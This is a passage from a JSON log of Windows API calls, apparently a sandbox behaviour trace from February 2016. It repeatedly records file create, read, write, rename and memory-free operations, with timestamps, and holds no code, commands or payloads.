"2016-02-16 17:41:58,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,116", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtSetInformationFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:58,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:58,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,416", "api": "NtWriteFile"}, {"category": 